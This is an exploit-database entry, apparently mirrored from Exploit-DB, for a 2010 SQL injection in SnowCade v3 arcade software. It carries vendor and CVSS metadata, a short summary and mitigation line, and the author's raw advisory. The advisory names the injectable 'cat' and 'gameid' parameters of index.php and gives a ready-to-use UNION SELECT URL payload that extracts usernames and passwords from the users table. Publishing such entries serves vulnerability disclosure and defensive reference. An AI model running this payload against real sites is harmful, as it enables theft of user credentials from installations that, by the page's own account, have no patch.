header-logo
Suggest Exploit
vendor:
SnowCade
by:
ahwak2000
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: SnowCade
Affected Version From: 3.0
Affected Version To: 3.0
Patch Exists: NO
Related CWE: N/A
CPE: a:arcadecreate:snowcade
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

SnowCade v3 SQL Injection Vulnerability

SnowCade v3 is vulnerable to SQL Injection. Attackers can inject malicious SQL queries via the 'cat' and 'gameid' parameters in the 'index.php' script. An example of a malicious query is '31%20UNION%20SELECT%201,CONCAT_WS%28CHAR%2832,58,32%29,username,password%29,3,4,5,6+from+users%20limit%201,1--' which can be used to extract sensitive information from the database.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

/*
[-] SnowCade v3 SQL Injection Vulnerability [-]


---Date : 2010-06-19
---Author : ahwak2000
---Email : z.u5[at]hotmail.com
[-] Script Info [-]
---Home : http://www.arcadecreate.com/

[-] Vulnerability [-]


http://site.com/[path]/index.php?action=browse&cat=[SQL INj]



http://site.com/[path]/index.php?action=playgame&gameid=[SQL INj]



http://site.com/[path]/index.php?action=browse&cat=[SQL INj]



[-] DEM0[-]
http://server/snowcade/index.php?action=browse&cat=31%20UNION%20SELECT%201,CONCAT_WS%28CHAR%2832,58,32%29,username,password%29,3,4,5,6+from+users%20limit%201,1--

[-] Greetz to [-]

To All Friends in V4-team Forums And pc.pirate
*/

Navigation

Suggest Exploit

Services By CQR